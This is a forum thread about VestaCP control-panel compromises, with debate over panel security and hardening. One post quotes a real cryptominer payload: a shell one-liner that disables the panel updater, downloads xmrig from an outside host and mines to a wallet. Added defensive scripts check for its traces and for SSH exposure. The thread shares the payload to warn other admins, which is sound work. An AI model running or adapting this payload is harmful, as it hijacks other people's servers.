VestaCP again hacked. UPDATE IMMEDIATELY! - Page 4

  • v3ng Member, Patron Provider

    imo virtualmin is not that user-friendly and visually attractive.

    Thanked by 2NanoG6 desperand
  • @jarland said:

    AnthonySmith said: I had to use vesta the other day for the first time, I was left with a "huh" feeling, not sure why anyone chooses it, there are other free and superior options available.

    It's the most visually attractive free panel (without free meaning "until X then license") as well as the most simplistic one to modify for customizations.

    And also the easiest to use for clients after Sentora (almost dead)

  • jsg Member, Resident Benchmarker

    @codetech12 said:

    @vonlz said:
    I think that cPanel - Direct Admin are the best Hosting Controller. You should backup and transfer to another control panel

    They are not free and open source :/

    So what? Do their users provide hosting for free?

    I think we should once more leave religion behind and think straight and rational. The decisive factor for software is not whether it's open source but QUALITY (good design, reliability, safety, ...).

    True, there is a ton of mediocre or even poor commercial and closed source software out there. But the same is true for open source.

    The problem is that software engineers just like mechanical engineers or architects have to have (and get and pay for) some good education and to amass a good amount of experience under their belts to be good engineers. And they need to pay for rent, more education, to eat, etc. just like every other engineer. So there is a quite strong tendency that good software engineers will do the majority of their work for payment. Most simply have to.

    Thanked by 1ma2t
  • Just giving a heads up. Hit a case of this with a monero miner. They injected a backup config for sftp so the miner would reinfect on a cron. I went and just deleted the whole API folder.

    Below is the payload.

    echo '#!/bin/sh'>../../bin/v-update-sys-vesta;cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/beedb/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null

    Thanked by 1jar
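
The payload in the post above first overwrites `v-update-sys-vesta` with a bare shebang, then clears and restarts a miner from `/tmp`. The following triage script is an added example, not part of the original post: the function names are hypothetical, the VestaCP `bin` directory is passed in as an argument, and any hit is a lead to investigate rather than proof.

```shell
#!/bin/sh
# Added example (not from the thread): triage for traces of the posted payload.
# Function names are hypothetical; paths are arguments, not VestaCP facts.

# True if $1 exists and holds nothing beyond a shebang or blank lines, which
# is what the payload's `echo '#!/bin/sh' > .../v-update-sys-vesta` leaves.
updater_is_stubbed() {
    [ -f "$1" ] || return 1
    body=$(grep -v -e '^#!' -e '^[[:space:]]*$' "$1" | wc -l | tr -d ' ')
    [ "$body" -eq 0 ]
}

# Print the file names handled by the payload's cleanup step that exist in
# directory $1 (the payload works in /tmp).
miner_files_in() {
    for name in xmrig xmr-stak cpu.txt pools.txt config.txt; do
        [ -e "$1/$name" ] && printf '%s\n' "$1/$name"
    done
    return 0
}

# Filter `ps -eo pid,args` text on stdin for the miner names and flags used.
miner_cmdlines() {
    grep -E '(^|[/ ])(xmrig|xmr-stak)( |$)|--algo=cryptonight|--donate-level=' || true
}

# Live use: sh triage.sh --scan /path/to/vesta/bin
if [ "${1:-}" = "--scan" ]; then
    bin_dir=${2:?missing vesta bin directory}
    if updater_is_stubbed "$bin_dir/v-update-sys-vesta"; then
        echo "STUBBED UPDATER: $bin_dir/v-update-sys-vesta"
    fi
    miner_files_in /tmp
    ps -eo pid,args | miner_cmdlines
fi
```
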
  • VestaCP is a really good panel, the problem is the abandonment by the developers.

  • jar Patron Provider, Top Host, Veteran

    @emptyPD said:
    VestaCP is a really good panel, the problem is the abandonment by the developers.

    Except it isn't abandoned at all. Do you follow the project?

  • Question, why was op banned?

  • v3ng Member, Patron Provider

    @jarland said:

    @emptyPD said:
    VestaCP is a really good panel, the problem is the abandonment by the developers.

    Except it isn't abandoned at all. Do you follow the project?

    Kind of.. They just don't give a f*** about open issues and pull requests...

  • Eased Member, Host Rep

    @emptyPD said:
    VestaCP is a really good panel, the problem is the abandonment by the developers.

    Huh? VestaCP is a steaming pile of garbage that is practically bent over begging for hacker penetration. Personally when I see people or companies using it I instantly make assumptions about their lack of technical expertise and professionalism. But hey, to each their own.

  • deank Member, Troll
    edited July 2018

    @AlyssaD said:
    Question, why was op banned?

    Ban evasion, 5 duplicate accounts, etc

    He knew his end was nigh.

  • jsg Member, Resident Benchmarker

    @Eased said:

    @emptyPD said:
    VestaCP is a really good panel, the problem is the abandonment by the developers.

    Huh? VestaCP is a steaming pile of garbage that is practically bent over begging for hacker penetration.

    That's shooting from a big cannon. Would you mind to elaborate/provide some evidence for that assertion?

    (I guess you might be right but still hefty assertions like the one you made here require some evidence/elaboration).

    Thanked by 1ma2t
  • Falzo Member

    Personally when I see people instantly make assumptions about companies technical expertise and professionalism by just looking at what products they might be using, it's giving me diabetes. But hey, to each their own.

  • KuJoe Member, Host Rep

    I'm a big fan of VestaCP, even with all of its flaws (and there's a lot of them) I still prefer using it over most other control panels. It's so much easier to modify compared to any other panel I've used so far which is a big selling point for me.

    Thanked by 2Shazan desperand
  • I really wish they would run a second admin panel just for the API. This API could then be easily firewalled off to certain IPs. By default, have the port blocked.

  • jar Patron Provider, Top Host, Veteran

    @KuJoe said:
    I'm a big fan of VestaCP, even with all of its flaws (and there's a lot of them) I still prefer using it over most other control panels. It's so much easier to modify compared to any other panel I've used so far which is a big selling point for me.

    Aye. I mean, frankly, would be easier to take extra measures to secure it for your own usage than many others. Think about putting cpanel behind http auth, for example, without it freaking out on you later. Like a 60 second job on Vesta that runs without caring for years at this rate.

    For me, I've disabled the API and will soon be disabling admin UI and shell access. Doesn't fix all possible exploits but severely limits attack vectors. Granted I'm not talking about selling anything on them (just the people on them, who already know the risks).

  • @Falzo said:

    Personally when I see people instantly make assumptions about companies technical expertise and professionalism by just looking at what products they might be using, it's giving me diabetes. But hey, to each their own.

    This entire thread has given me diabetes.

    Thanked by 1Falzo
  • Is VestaCP safe to use again?
    Thanks.

  • @greattomeetyou said:
    Is VestaCP safe to use again?
    Thanks.

    As much as a gun. If you know how to use it and are aware of the risks & give thought to measures that prevent abuse it's all good^^

  • Eased Member, Host Rep
    edited September 2018

    @Falzo @jsg @AuroraZ
    Your guy's favorite control panel got hacked again. :(
    https://forum.vestacp.com/viewtopic.php?f=10&t=17641

    Thanked by 1coreflux
  • Shazan Member, Host Rep

    Seems they simply logged in via SSH as the admin user.

  • jsg Member, Resident Benchmarker

    @Eased said:
    @Falzo @jsg @AuroraZ
    Your guy's favorite control panel got hacked again. :(
    https://forum.vestacp.com/viewtopic.php?f=10&t=17641

    I don't have a guy here. And more importantly, I dislike all panels not least due to grave security concerns. I just happen to think that a statement like "XYZ is a pile of garbage" should at least be accompanied by some information and facts.

  • @deank said:
    And you say the end is far....

    Yeah, right. Embrace the truth and join the cult.

    What is this with your the end troll ?

    Do

  • @codetech12 said:

    @deank said:
    A quick browse at their forum reveals some dude with 110 servers hacked to mine coins.

    lenk plox

    Ha ha ... He doesn't know what us Lenk and link and plox is please.

  • @codetech12 said:

    @vimalware said:
    Why is everyone still hostage to this buggy panel?

    Take your data and run to Virtualmin LEMP minimal (pass "--minimal --bundle LEMP" to virtualmin installer script.)

    ref: https://www.virtualmin.com/documentation/installation/automated#toc-lamp-vs-lemp-7YxCS8LI

    It is opensource. Maybe you contribute and get these issues fixed... :)

    Min vestacp pros and cons?
    And reasonable resources needed?

  • @Eased said:
    @Falzo @jsg @AuroraZ
    Your guy's favorite control panel got hacked again. :(
    https://forum.vestacp.com/viewtopic.php?f=10&t=17641

    lol. proof or didn't happen :-P

    to be honest, there is not much to be seen so far, as already mentioned in the other thread.
    agreed - it seems related to servers running vestacp, yet there is so much information missing.

    no one really posted what malware exactly and where it was located, what timestamps, there obviously are no cron entries and stuff to keep it running etc.

    I saw some etc and log-files from an 'infected' server and despite the last auth.log and secure were deleted, there was nothing really interesting to see. no changes to files in /etc so no cron-stuff there, passwd and shadow untouched ...

    only thing I noticed was that the server was running ssh on port 22 with obviously no restriction on what users could login (default setup). so the vesta user admin which can sudo could easily log in, if the password had been compromised or brute forced. this f.i. could have happened with the last hack already and if the admins didn't change those passwords... shit happens.

    would be interesting to hear from affected people with 20-30 VMs if they had the same setup on all of those machines, maybe even the same admin-pw for easier management or old ones? ssh access allowed for admin? so yeah. blame it on vesta, that's the easiest way.

    I have servers in OVH running vesta. so far nothing happened. did I mention that the admin account does not have ssh access on any of them? however, of course vesta could come with more restrictive settings in the beginning.

    after all I am not here to defend Vesta or any other panel. I didn't like how Sergej the main developer handled the last incident anyway.
    and I agree with @jsg that panels often make things worse when it comes to security, because most who use such things don't know or don't care until they got hacked.

    still I'll continue using panels (including vesta), if I think I am capable of handling them and their surroundings properly and not just relying blindly on anything that came with it out of the box.
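
The post above attributes the exposure to sshd on port 22 with no restriction on which users may log in, leaving the sudo-capable `admin` user reachable by password. The following check is an added example, not part of the original post: it reads a saved `sshd -T` dump and classifies one user, the function names are hypothetical, and group rules, negated patterns and keyboard-interactive logins are not evaluated.

```shell
#!/bin/sh
# Added example (not from the thread): can a given user reach sshd, and with
# a password? Input is a saved `sshd -T` dump, e.g. `sshd -T > sshd.effective`.
# Match blocks are only reflected if the dump was taken with -C parameters.

# Print every value of keyword $1 found in dump file $2, one per line.
sshd_values() {
    awk -v k="$1" 'tolower($1) == k { for (i = 2; i <= NF; i++) print $i }' "$2"
}

# True if user $1 matches a USER or USER@HOST pattern of keyword $2 in file $3.
# Runs in a subshell so `set -f` (no filename expansion of * or ?) stays local.
user_listed() (
    set -f
    for pat in $(sshd_values "$2" "$3"); do
        # Only the user part is compared; the pattern may contain * and ?
        case $1 in ${pat%%@*}) exit 0 ;; esac
    done
    exit 1
)

# Print denied, password or key-only for user $1 under dump file $2.
# Order follows sshd_config(5): DenyUsers is evaluated before AllowUsers.
ssh_exposure() {
    if user_listed "$1" denyusers "$2"; then
        echo denied
    elif [ -n "$(sshd_values allowusers "$2")" ] &&
         ! user_listed "$1" allowusers "$2"; then
        echo denied    # an AllowUsers list exists and the user is not on it
    elif [ "$(sshd_values passwordauthentication "$2")" = yes ]; then
        echo password  # the default setup described in the post
    else
        echo key-only
    fi
}

# Live use: sh check.sh --check sshd.effective [user]
if [ "${1:-}" = "--check" ]; then
    ssh_exposure "${3:-admin}" "${2:?missing sshd -T dump file}"
fi
```
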

  • MikeA Member, Patron Provider

    @Falzo I wish I had your confidence that Vesta was safe after so many incidents.

    Thanked by 1vimalware
  • jar Patron Provider, Top Host, Veteran

    @MikeA said:
    @Falzo I wish I had your confidence that Vesta was safe after so many incidents.

    For what it's worth I have two VestaCP based systems that I just can't disable on a whim. The customers on them know that I considered it more risky than the new platform, but they wanted it, so it's this right balance of "They know the risks" and "I'm willing to hold off on action until I see more data." These two servers are reasonably high value targets so I'm obviously watching them very closely.

    To be fair, I've disabled API access and Roundcube is only accessible in a manual installation under a privileged user account.

    I also have an additional avenue for data to know if VestaCP instances are being compromised in bulk, from arguably the highest value IP ranges from the last vulnerability. I'm not currently seeing evidence of it.

    Again not to say there is no vulnerability, there may well be, but if someone has a vulnerability in hand they are not using it very well if they have any degree of automation running for the exploits.

    Thanked by 1Falzo
  • MikeA Member, Patron Provider

    @jar said:

    @MikeA said:
    @Falzo I wish I had your confidence that Vesta was safe after so many incidents.

    For what it's worth I have two VestaCP based systems that I just can't disable on a whim. The customers on them know that I considered it more risky than the new platform, but they wanted it, so it's this right balance of "They know the risks" and "I'm willing to hold off on action until I see more data." These two servers are reasonably high value targets so I'm obviously watching them very closely.

    To be fair, I've disabled API access and Roundcube is only accessible in a manual installation under a privileged user account.

    I also have an additional avenue for data to know if VestaCP instances are being compromised in bulk, from arguably the highest value IP ranges from the last vulnerability. I'm not currently seeing evidence of it.

    Again not to say there is no vulnerability, there may well be, but if someone has a vulnerability in hand they are not using it very well if they have any degree of automation running for the exploits.

    I don't mean "Vesta overall", but most people really don't secure things properly.. well, at all, but either way a part of these issues have always been related to Vesta. Maybe Vesta should include a security guide during install...

    Thanked by 2jar coreflux
  • So, I guess back to cwp ?

  • MikeA Member, Patron Provider

    @yokowasis said:
    So, I guess back to cwp ?

    It really isn't bad, just the UI is kinda wonky.
